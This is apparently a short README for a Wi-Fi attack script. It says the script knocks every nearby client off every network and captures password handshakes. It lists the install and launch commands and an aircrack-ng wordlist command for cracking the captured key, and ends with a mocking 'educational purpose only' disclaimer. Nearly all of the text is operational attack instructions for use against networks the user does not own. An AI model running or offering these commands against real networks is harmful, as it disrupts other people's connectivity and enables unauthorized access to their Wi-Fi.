This script deauth everyone on every wifi around you & grab password hash !
First install the requirements :
pip3 install -r requirements.txt
Now you can launch the script !
python3 heheheha.py {YOUR_WIFI_INTERFACE} {YOUR_MONITOR_WIFI_INTERFACE}
or
python3 heheheha.py
[use wlan0 on both interface]
exemple:
python3 heheheha.py wlan0 wlan0
The file who contain the Handshake is on the current directory, for crack the key make a aircrack command with your fav wordlist :
aircrack-ng the_output_name.cap -w /home/root/wordlist/your_wordlist.txt
Just for educational purpose only, Do, what you want I don’t give a fuck, but it’s not my fault you’re in trouble.